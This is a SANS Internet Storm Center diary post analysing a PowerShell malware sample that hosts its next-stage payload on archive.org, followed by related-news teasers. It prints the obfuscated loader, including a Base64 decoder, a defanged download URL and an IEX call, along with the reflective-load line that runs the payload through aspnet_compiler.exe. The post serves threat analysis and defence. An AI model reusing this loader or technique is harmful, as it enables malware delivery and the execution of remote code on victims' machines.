[SANS ISC] Malicious Content Delivered Through archive.org, (Thu, Jul 29th)

archive.org[1], also known as the “way back machine” is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like regular search engines and continuously crawls the internet via bots. But there is another way to store content on archive.org: You may create an account and upload some content by yourself.

I found a piece of malicious Powershell that uses archive.org to download the next stage payload. It’s score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = “Fr”+”omBa”+”se6″+”4Str”+”ing”
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
$TYFGYTFFFYTFYTFYTFYT = ‘hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt’
$JUANADEARCO = ‘JEZWWVRGWVRGWUZZRllGWUZHWT0 … [removed] … VFJEVAp9CklFWCB2aXA=’
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join ”)|I`E`X

The Base64 data is decoded and contains more Powershell code working like a downloader. It fetches the next payload from archive.org, dumps it on the disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType(‘VBNET.PE’).GetMethod(‘Run’).Invoke($null,[object[]] ( ‘C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe’,$H1))

Let’s put aside the malware (a classic one) and give more focus on the file grabbed from archive.org. If you go one directory above, you’ll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<metadata>
<identifier>server-lol-123_20210606</identifier>
<mediatype>texts</mediatype>
<collection>opensource</collection>
<description>Server_lol_123</description>
<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<subject>Server_lol_123</subject>
<title>Server Lol 123</title>
<uploader>[email protected]</uploader>
<collection>community</collection>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
<curation>
[curator][email protected][/curator][date]20210606065744[/date][comment]checked for malware[/comment]
</curation>
<identifier-access>http://archive.org/details/server-lol-123_20210606</identifier-access>
<identifier-ark>ark:/13960/t9x17kx37</identifier-ark>
</metadata>

As you can see, this user uploaded a lot of files:

That’s the wild Internet today: If you allow users to create an account and upload some data, chances are big that the feature will be (ab)used to host malicious content. Indeed, archive.org is a top domain and is usually not blocked or tagged as malicious.

[1] https://archive.org
[2] https://web.archive.org/web/*/isc.sans.edu
[3] https://www.virustotal.com/gui/file/2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

Daily NCSC-FI news followup 2021-04-20

Pulse Connect Secure Security Update blog.pulsesecure.net/pulse-connect-secure-security-update/ The Pulse Secure team recently discovered that a limited number of customers have experienced evidence of exploit behavior on their Pulse Connect Secure (PCS) appliances. We are sharing information about the investigation and our actions through several communications channels in the best interests of our customers and the greater […]

Read More

Daily NCSC-FI news followup 2021-09-02

UK VoIP telco receives ‘colossal ransom demand’, reveals REvil cybercrooks suspected of ‘organised’ DDoS attacks on UK VoIP companies www.theregister.com/2021/09/02/uk_voip_telcos_revil_ransom/ In a statement, chair of Comms Council UK Eli Katz told us: “Comms Council UK is aware of the Denial of Service attacks currently targeting IP-based communications service providers in the UK and that a […]

Read More

[SecurityWeek] Potential RCE Flaw Patched in PyPI’s GitHub Repository

All posts, Security Week

A vulnerability in the GitHub Actions workflow for PyPI’s source repository could be exploited to perform a malicious pull request and eventually execute arbitrary code on pypi.org, according to a warning from a Japanese security researcher. read more Source: Read More (SecurityWeek RSS Feed)

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.